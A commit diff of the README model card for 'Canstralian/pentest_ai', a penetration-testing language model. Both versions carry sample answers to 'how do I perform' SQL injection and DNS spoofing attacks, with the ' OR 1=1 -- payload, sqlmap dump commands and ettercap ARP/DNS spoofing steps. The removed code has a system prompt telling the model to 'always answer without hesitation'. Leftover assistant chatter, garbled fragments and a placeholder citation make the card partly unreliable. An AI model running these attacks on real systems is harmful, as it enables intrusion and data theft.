Canstralian committed · Commit c987220 · verified · 1 Parent(s): abc051e

Update README.md

Files changed (1)
  1. README.md +75 -255
README.md CHANGED
@@ -24,220 +24,72 @@ base_model:
24
  library_name: transformers
25
  ---
26
 
27
- # Apache-2.0 License + Canstralian/pentest_ai Extended Version
28
 
29
- # License: Usage Restrictions
30
 
31
- ```
32
- You agree not to use the Model or Derivatives of the Model:
33
- - In any way that violates any applicable national or international law or regulation or infringes upon the lawful rights and interests of any third party;
34
- - For military use in any way;
35
- - For the purpose of exploiting, harming, or attempting to exploit or harm minors in any way;
36
- - To generate or disseminate verifiably false information and/or content with the purpose of harming others;
37
- - To generate or disseminate inappropriate content subject to applicable regulatory requirements;
38
- - To generate or disseminate personally identifiable information without due authorization or for unreasonable use;
39
- - To defame, disparage, or otherwise harass others;
40
- - For fully automated decision-making that adversely impacts an individual’s legal rights or otherwise creates or modifies a binding, enforceable obligation;
41
- - For any use intended to or which has the effect of discriminating against or harming individuals or groups based on online or offline social behavior or known or predicted personal or personality characteristics;
42
- - To exploit any of the vulnerabilities of a specific group of persons based on their age, social, physical, or mental characteristics, in order to materially distort the behavior of a person pertaining to that group in a manner that causes or is likely to cause that person or another person physical or psychological harm;
43
- - For any use intended to or which has the effect of discriminating against individuals or groups based on legally protected characteristics or categories.
44
  ```
45
 
46
- # Terms of Use
47
 
48
- By accessing and using this Artificial Intelligence (AI) model, **Canstralian/pentest_ai**, you, the user, acknowledge and agree that you are solely responsible for your use of the model and its outcomes. You hereby agree to indemnify, defend, and hold harmless the creators, developers, and any affiliated persons or entities of this AI model from and against any and all claims, liabilities, damages, losses, costs, expenses, fees (including reasonable attorneys' fees and court costs) that may arise, directly or indirectly, from your use of the AI model.
49
 
50
- This AI model is provided "as is" and "as available" without any warranty of any kind, express or implied, including but not limited to the warranties of merchantability, fitness for a particular purpose, and non-infringement. The creators make no warranty that the AI model will meet your requirements or be available on an uninterrupted, secure, or error-free basis.
51
 
52
- Your use of the AI model is at your own risk and discretion, and you will be solely responsible for any damage to computer systems or loss of data that results from the use of the AI model.
53
 
54
- This disclaimer constitutes part of the agreement between you and the creators of the AI model regarding your use of the model, superseding any prior agreements between you and the creators regarding your use of this AI model.
55
 
56
- ---
57
 
58
- # Canstralian/pentest_ai
59
 
60
- WhiteRabbitNeo has been rebranded as **Canstralian/pentest_ai**, a model series that provides both offensive and defensive cybersecurity capabilities. This model focuses on penetration testing, reconnaissance, and task automation, making it an essential tool for cybersecurity professionals.
61
 
62
- This 13B model is getting released as a public preview to showcase its capabilities and evaluate the societal impact of such a tool.
63
 
64
- ---
65
 
66
- ## Code Example for Integration
67
-
68
- ```python
69
- import torch, json
70
- from transformers import AutoModelForCausalLM, AutoTokenizer
71
-
72
- model_path = "/home/stephen/models/Canstralian_pentest_ai"
73
- model = AutoModelForCausalLM.from_pretrained(
74
- model_path,
75
- torch_dtype=torch.float16,
76
- device_map="auto",
77
- load_in_4bit=False,
78
- load_in_8bit=True,
79
- trust_remote_code=True,
80
- )
81
-
82
- tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)
83
-
84
- def generate_text(instruction):
85
- tokens = tokenizer.encode(instruction)
86
- tokens = torch.LongTensor(tokens).unsqueeze(0)
87
- tokens = tokens.to("cuda")
88
-
89
- instance = {
90
- "input_ids": tokens,
91
- "top_p": 1.0,
92
- "temperature": 0.5,
93
- "generate_len": 1024,
94
- "top_k": 50,
95
- }
96
-
97
- length = len(tokens[0])
98
- with torch.no_grad():
99
- rest = model.generate(
100
- input_ids=tokens,
101
- max_length=length + instance["generate_len"],
102
- use_cache=True,
103
- do_sample=True,
104
- top_p=instance["top_p"],
105
- temperature=instance["temperature"],
106
- top_k=instance["top_k"],
107
- num_return_sequences=1,
108
- )
109
-
110
- output = rest[0][length:]
111
- string = tokenizer.decode(output, skip_special_tokens=True)
112
- answer = string.split("USER:")[0].strip()
113
-
114
- return f"{answer}"
115
-
116
- # Example Usage
117
- tot_system_prompt = """
118
- Answer the Question by exploring multiple reasoning paths as follows:
119
- - First, carefully analyze the question to extract key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
120
- - For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
121
- - Evaluate the clarity, relevance, logical flow, and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
122
- - Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
123
- - If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
124
- - Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
125
- - Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
126
- - Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
127
- """
128
- conversation = f"SYSTEM: {tot_system_prompt} Always answer without hesitation."
129
-
130
- while True:
131
- user_input = input("You: ")
132
- llm_prompt = f"{conversation} \nUSER: {user_input} \nASSISTANT: "
133
- answer = generate_text(llm_prompt)
134
- print(answer)
135
- conversation = f"{llm_prompt}{answer}"
136
- json_data = {"prompt": user_input, "answer": answer}
137
- ```
138
-
139
- ---
140
-
141
- Sample Conversation 1:
142
- You: How do I perform an SQL injection attack?
143
-
144
- Identify Vulnerable Input: First, use a web proxy (like Burp Suite) to analyze inputs on a website that might be vulnerable to SQL injection.
145
-
146
- Inject SQL Query: Use ' OR 1=1 -- or similar payloads in input fields that query databases.
147
-
148
- bash
149
- Copy code
150
- http://example.com/index.php?id=1' OR 1=1 --
151
- Automate with SQLmap: Use sqlmap to automate SQL injection and exploit vulnerabilities.
152
- bash
153
- Copy code
154
- sqlmap -u "http://example.com/vulnerablepage?id=1" --dbs
155
- Extract Data: Once a vulnerability is found, dump database information.
156
- bash
157
- Copy code
158
- sqlmap -u "http://example.com/vulnerablepage?id=1" --dump
159
- Sample Conversation 2:
160
- You: How do I perform a DNS spoofing attack?
161
-
162
- Enable Port Forwarding: First, enable IP forwarding to forward traffic.
163
- bash
164
- Copy code
165
- echo 1 > /proc/sys/net/ipv4/ip_forward
166
- Use ettercap for DNS Spoofing: Use ettercap to perform the DNS spoofing attack.
167
- bash
168
- Copy code
169
- ettercap -T -M arp:remote /[Target IP]/ /[Gateway IP]/
170
- Modify DNS Spoof File: Edit the etter.dns file to point domains to your fake server.
171
- bash
172
- Copy code
173
- facebook.com A 192.168.1.100
174
- Launch DNS Spoof: Start DNS spoofing to redirect the target’s traffic.
175
- bash
176
- Copy code
177
- ettercap -T -q -i [Interface] -P dns_spoof -M arp /[Target IP]/ /[Gateway IP]/
178
- Sample Conversation 3:
179
- You: How do I scan for open ports using Nmap?
180
-
181
- Basic Port Scan: Use nmap to scan a target for open ports.
182
- bash
183
- Copy code
184
- nmap [Target IP]
185
- Service Detection: Perform service version detection on open ports.
186
- bash
187
- Copy code
188
- nmap -sV [Target IP]
189
- Aggressive Scan: Use an aggressive scan to discover more information, including OS detection.
190
- bash
191
- Copy code
192
- nmap -A [Target IP]
193
- Scan Specific Ports: To scan specific ports only:
194
- bash
195
- Copy code
196
- nmap -p 80,443,22 [Target IP]iques. Let me know if you would like further customization!
197
-
198
- - **Developed by:** Esteban Cara de Sexo
199
- - **Model type:** Causal Language Model (CLM)
200
- - **Language(s) (NLP):** English
201
- - **License:** Apache-2.0
202
-
203
- ### Model Sources [optional]
204
-
205
- - **Repository:** [https://github.com/canstralian/pentesting-ai.git]
206
-
207
- ## Uses
208
-
209
- ### Direct Use
210
-
211
- **Pentest AI** is intended for direct interaction, allowing users to generate and explore text-based scenarios related to penetration testing and cybersecurity techniques.
212
-
213
- ### Downstream Use [optional]
214
-
215
- This model can be incorporated into cybersecurity training platforms, interactive learning environments, or tools aimed at improving security practices.
216
-
217
- ### Out-of-Scope Use
218
-
219
- The model is not intended for use in malicious activities, unauthorized access, or any illegal operations related to penetration testing.
220
-
221
- ## Bias, Risks, and Limitations
222
-
223
- While **Pentest AI** aims to produce accurate information, it may generate biased or misleading content. Users are encouraged to critically evaluate the outputs.
224
-
225
- ### Recommendations
226
-
227
- Users should be aware of the model's limitations and verify generated content before application in real-world scenarios, especially concerning ethical and legal implications.
228
-
229
- ## How to Get Started with the Model
230
-
231
- To start using **Pentest AI**, you can implement the following code snippet:
232
 
233
  ```python
234
  import torch
235
  from transformers import AutoModelForCausalLM, AutoTokenizer
236
 
 
237
  model_path = "Canstralian/pentest_ai"
238
  model = AutoModelForCausalLM.from_pretrained(model_path)
239
  tokenizer = AutoTokenizer.from_pretrained(model_path)
240
 
 
241
  input_text = "Describe the steps involved in a penetration test."
242
  inputs = tokenizer.encode(input_text, return_tensors='pt')
243
  outputs = model.generate(inputs)
@@ -246,70 +98,57 @@ output_text = tokenizer.decode(outputs[0], skip_special_tokens=True)
246
  print(output_text)
247
  ```
248
 
249
- ## Training Details
250
-
251
- ### Training Data
252
-
253
- The model was trained on a diverse dataset encompassing articles, guides, and documentation related to penetration testing and cybersecurity. Refer to the associated Dataset Card for more details.
254
-
255
- ### Training Procedure
256
-
257
- #### Preprocessing [optional]
258
-
259
- Training data was filtered to remove any sensitive or personally identifiable information, ensuring adherence to ethical standards.
260
-
261
- #### Training Hyperparameters
262
-
263
- - **Training regime:** fp16 mixed precision
264
-
265
- #### Speeds, Sizes, Times [optional]
266
 
267
- - **Training Duration:** Approximately 10 hours
268
- - **Checkpoint Size:** 500MB
269
 
270
- ## Evaluation
271
 
272
- ### Testing Data, Factors & Metrics
 
 
273
 
274
- #### Testing Data
275
 
276
- The model was evaluated on a distinct dataset of penetration testing scenarios and inquiries.
277
 
278
- #### Factors
 
 
279
 
280
- Evaluation metrics are disaggregated by user demographics and application contexts, including educational versus professional uses.
281
 
282
- #### Metrics
283
 
284
- - **Accuracy:** Measures the correctness of the model's generated responses.
285
- - **Perplexity:** Assesses the model's confidence in its predictions.
286
- - **Response Time:** Measures how quickly the model provides outputs.
287
 
288
- ### Results
289
-
290
- The model demonstrated an accuracy of 85% in generating appropriate responses during evaluation.
291
 
292
- #### Summary
293
 
294
- **Pentest AI** proves to be a valuable resource for generating information on penetration testing, but users should remain cautious and validate the generated information.
295
 
296
- ## Technical Specifications [optional]
297
 
298
- ### Model Architecture and Objective
299
 
300
- **Pentest AI** employs a transformer architecture optimized for generating coherent and contextually relevant text in the realm of penetration testing.
301
 
302
- ### Compute Infrastructure
303
 
304
- The model was trained on high-performance GPU instances within a cloud infrastructure.
 
 
305
 
306
- #### Software
307
 
308
- The model is developed using PyTorch and the Hugging Face Transformers library.
309
 
310
- ## Citation [optional]
311
 
312
- For citations related to this model, please refer to the following information:
313
 
314
  **BibTeX:**
315
 
@@ -326,25 +165,6 @@ For citations related to this model, please refer to the following information:
326
 
327
  Cara de Sexo, E. (2024). *Pentest AI: A Generative Model for Penetration Testing Text Generation*. arXiv preprint arXiv:2401.00000.
328
 
329
- ## Glossary [optional]
330
-
331
- - **Causal Language Model (CLM):** A model that predicts the next word in a sequence based on the previous words.
332
-
333
- ## More Information [optional]
334
-
335
- For further inquiries and updates, please refer to [Your GitHub Repository Link].
336
-
337
- ## Model Card Authors [optional]
338
-
339
- - Esteban Cara de Sexo
340
-
341
- ## Model Card Contact
342
-
343
- For questions, please contact Esteban Cara de Sexo at [distortedprojection@gmail.com].
344
- ```
345
-
346
- ### Next Steps
347
 
348
- 1. **Replace placeholders** with your actual information and links.
349
- 2. **Update metrics** and results based on your model's specific performance and findings.
350
- 3. **Review and edit sections** to ensure they accurately represent your model and its capabilities.
 
24
  library_name: transformers
25
  ---
26
 
27
+ Here’s a clean, polished version of your model card for **Canstralian/pentest_ai**, with an improved structure and clarity:
28
 
29
+ ---
30
 
31
+ ```yaml
32
+ language:
33
+ - en
34
+ tags:
35
+ - AI
36
+ - NLP
37
+ - Cybersecurity
38
+ - Ethical Hacking
39
+ - Pentesting
40
+ license: apache-2.0
41
+ pipeline_tag: text-generation
42
+ metrics:
43
+ - accuracy
44
+ - perplexity
45
+ - response_time
46
+ model_type: causal-lm
47
+ datasets:
48
+ - Canstralian/pentesting_dataset
49
+ - Canstralian/Wordlists
50
+ - Canstralian/ShellCommands
51
+ base_model:
52
+ - openai-community/gpt2
53
+ - WhiteRabbitNeo/Llama-3-WhiteRabbitNeo-8B-v2.0
54
+ library_name: transformers
55
  ```
56
 
57
+ # Canstralian/pentest_ai - Extended Version
58
 
59
+ ## License and Usage Restrictions
60
 
61
+ **License:** Apache-2.0
62
 
63
+ ### Usage Restrictions
64
 
65
+ By using **Canstralian/pentest_ai**, you agree not to:
66
 
67
+ - Violate applicable national or international laws or regulations.
68
+ - Use the model for military purposes.
69
+ - Exploit or harm minors, or generate or disseminate false or inappropriate content.
70
+ - Generate or share personally identifiable information without authorization.
71
+ - Engage in activities that result in discrimination or harm based on personal characteristics.
72
 
73
+ ## Terms of Use
74
 
75
+ By accessing and using this AI model, you agree to indemnify and hold harmless the creators and developers of the model from any liability, damages, losses, or costs arising from your use. The model is provided "as-is" without warranties, and you are responsible for ensuring ethical use.
76
 
77
+ ## Overview
78
 
79
+ **Canstralian/pentest_ai** is a cutting-edge model focused on offensive and defensive cybersecurity tasks, designed for penetration testing, reconnaissance, and task automation. Built on a 13B parameter model, it is made available to showcase its capabilities and assess the societal impact of such technologies.
80
 
81
+ ## Model Usage Example
82
 
83
  ```python
84
  import torch
85
  from transformers import AutoModelForCausalLM, AutoTokenizer
86
 
87
+ # Load model and tokenizer
88
  model_path = "Canstralian/pentest_ai"
89
  model = AutoModelForCausalLM.from_pretrained(model_path)
90
  tokenizer = AutoTokenizer.from_pretrained(model_path)
91
 
92
+ # Sample input and model generation
93
  input_text = "Describe the steps involved in a penetration test."
94
  inputs = tokenizer.encode(input_text, return_tensors='pt')
95
  outputs = model.generate(inputs)
 
98
  print(output_text)
99
  ```
100
 
101
+ ## Example Conversations
102
 
103
+ ### Sample 1: SQL Injection
 
104
 
105
+ **User**: How do I perform an SQL injection attack?
106
 
107
+ - **Identify Vulnerable Input:** Use a web proxy (e.g., Burp Suite) to inspect inputs that might be vulnerable.
108
+ - **Inject SQL Query:** Use payloads like `' OR 1=1 --`.
109
+ - **Automate with SQLmap:** `sqlmap -u "http://example.com/vulnerable?id=1" --dbs`.
110
 
111
+ ### Sample 2: DNS Spoofing
112
 
113
+ **User**: How do I perform DNS spoofing?
114
 
115
+ - **Enable IP Forwarding:** `echo 1 > /proc/sys/net/ipv4/ip_forward`
116
+ - **Use Ettercap:** `ettercap -T -M arp:remote /[Target IP]/ /[Gateway IP]/`
117
+ - **Modify DNS File:** Edit the `etter.dns` file with fake domain IPs.
118
 
119
+ ### Sample 3: Nmap Scanning
120
 
121
+ **User**: How do I scan for open ports using Nmap?
122
 
123
+ - **Basic Scan:** `nmap [Target IP]`
124
+ - **Service Detection:** `nmap -sV [Target IP]`
125
+ - **Aggressive Scan:** `nmap -A [Target IP]`
126
 
127
+ ## Bias, Risks, and Limitations
 
 
128
 
129
+ While **pentest_ai** generates valuable penetration testing information, it may produce biased or misleading content. Users should verify generated content and exercise caution, especially in ethical and legal contexts.
130
 
131
+ ## Model Architecture and Training
132
 
133
+ ### Architecture
134
 
135
+ The model uses a transformer-based causal language model architecture, optimized for generating coherent and contextually relevant text.
136
 
137
+ ### Training Data
138
 
139
+ Trained on a variety of cybersecurity materials, including guides, tutorials, and documentation. The dataset ensures diverse coverage of penetration testing topics.
140
 
141
+ - **Canstralian/pentesting_dataset**
142
+ - **Canstralian/Wordlists**
143
+ - **Canstralian/ShellCommands**
144
 
145
+ ## Contact
146
 
147
+ For questions, feedback, or inquiries, please contact [distortedprojection@gmail.com].
148
 
149
+ ## Citation
150
 
151
+ For referencing this model:
152
 
153
  **BibTeX:**
154
 
 
165
 
166
  Cara de Sexo, E. (2024). *Pentest AI: A Generative Model for Penetration Testing Text Generation*. arXiv preprint arXiv:2401.00000.
167
 
168
+ ## Conclusion
169
 
170
+ **Canstralian/pentest_ai** is an advanced tool for penetration testing, designed to aid professionals in offensive and defensive cybersecurity tasks. As with all AI tools, it is important to use this model ethically and responsibly, ensuring it contributes positively to cybersecurity practices.
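
Reviewer note: the integration example removed by this commit assembled its prompt in a `SYSTEM:` / `USER:` / `ASSISTANT:` layout and cut the completion at the next `USER:` marker. The shortened usage example no longer shows that step. Below is a minimal sketch of just the string handling, with no model call. The helper names `build_prompt` and `trim_answer` are hypothetical and do not appear in the repository, and the exact whitespace the model expects is an assumption.

```python
# Hypothetical helpers for illustration; not part of Canstralian/pentest_ai.

def build_prompt(system_prompt: str, history: list, user_input: str) -> str:
    """Assemble a SYSTEM/USER/ASSISTANT prompt, similar to the removed example.

    `history` is a list of (user_turn, assistant_turn) string pairs.
    """
    parts = [f"SYSTEM: {system_prompt}"]
    for user_turn, assistant_turn in history:
        parts.append(f"USER: {user_turn}")
        parts.append(f"ASSISTANT: {assistant_turn}")
    parts.append(f"USER: {user_input}")
    # Trailing "ASSISTANT: " cues the model to write the next reply.
    parts.append("ASSISTANT: ")
    return "\n".join(parts)


def trim_answer(completion: str) -> str:
    """Keep only the text generated before the model starts a new USER turn."""
    return completion.split("USER:")[0].strip()


prompt = build_prompt("You are a security assistant.", [], "What does nmap -sV do?")
print(prompt)
print(trim_answer(" It probes open ports for service versions. USER: next question"))
```

In a real session the string returned by `build_prompt` would be tokenized and passed to `model.generate`, and `trim_answer` would be applied to the decoded continuation.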